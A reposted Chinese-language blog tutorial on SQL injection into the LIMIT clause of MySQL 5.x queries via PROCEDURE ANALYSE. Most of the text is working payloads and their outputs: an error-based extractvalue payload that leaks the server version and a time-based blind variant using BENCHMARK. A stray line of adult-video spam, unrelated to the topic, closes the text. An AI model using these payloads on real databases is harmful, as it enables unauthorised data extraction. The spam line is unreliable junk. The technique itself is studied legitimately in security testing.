[轉載]SQL Injections in MySQL LIMIT clause 2016-04-11

from:https://rateip.com/blog/sql-injections-in-mysql-limit-clause/

此方法適用于MySQL 5.x中,在limit語句后面的注入

例如:

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT injection_point

上面的語句包含了ORDER BY,MySQL當中UNION語句不能在ORDER BY的后面,否則利用UNION很容易就可以讀取數據了,看看在MySQL 5中的SELECT語法:

SELECT
    [ALL | DISTINCT | DISTINCTROW ]
      [HIGH_PRIORITY]
      [STRAIGHT_JOIN]
      [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]
      [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]
    select_expr [, select_expr ...]
    [FROM table_references
    [WHERE where_condition]
    [GROUP BY {col_name | expr | position}
      [ASC | DESC], ... [WITH ROLLUP]]
    [HAVING where_condition]
    [ORDER BY {col_name | expr | position}
      [ASC | DESC], ...]
    [LIMIT {[offset,] row_count | row_count OFFSET offset}]
    [PROCEDURE procedure_name(argument_list)]
    [INTO OUTFILE 'file_name' export_options
      | INTO DUMPFILE 'file_name'
      | INTO var_name [, var_name]]
    [FOR UPDATE | LOCK IN SHARE MODE]]

在LIMIT后面可以跟兩個函數,PROCEDURE 和 INTO,INTO除非有寫入shell的權限,否則是無法利用的,那么使用PROCEDURE函數能否注入呢?

Let’s give it a try:

mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1);

ERROR 1386 (HY000): Can't use ORDER clause with this procedure

ANALYSE可以有兩個參數:

mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1,1);

ERROR 1386 (HY000): Can't use ORDER clause with this procedure

看起來并不是很好,繼續嘗試:

mysql> SELECT field from table where id > 0 order by id LIMIT 1,1 procedure analyse((select IF(MID(version(),1,1) LIKE 5, sleep(5),1)),1);

但是立即返回了一個錯誤信息:

ERROR 1108 (HY000): Incorrect parameters to procedure 'analyse'

sleep函數肯定沒有執行,但是最終我還是找到了可以攻擊的方式:

mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);

ERROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1'

如果不支持報錯注入的話,還可以基于時間注入:

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)

直接使用sleep不行,需要用BENCHMARK代替。

轉載自烏云zone:http://zone.wooyun.org/content/18220

一级A片不卡在线观看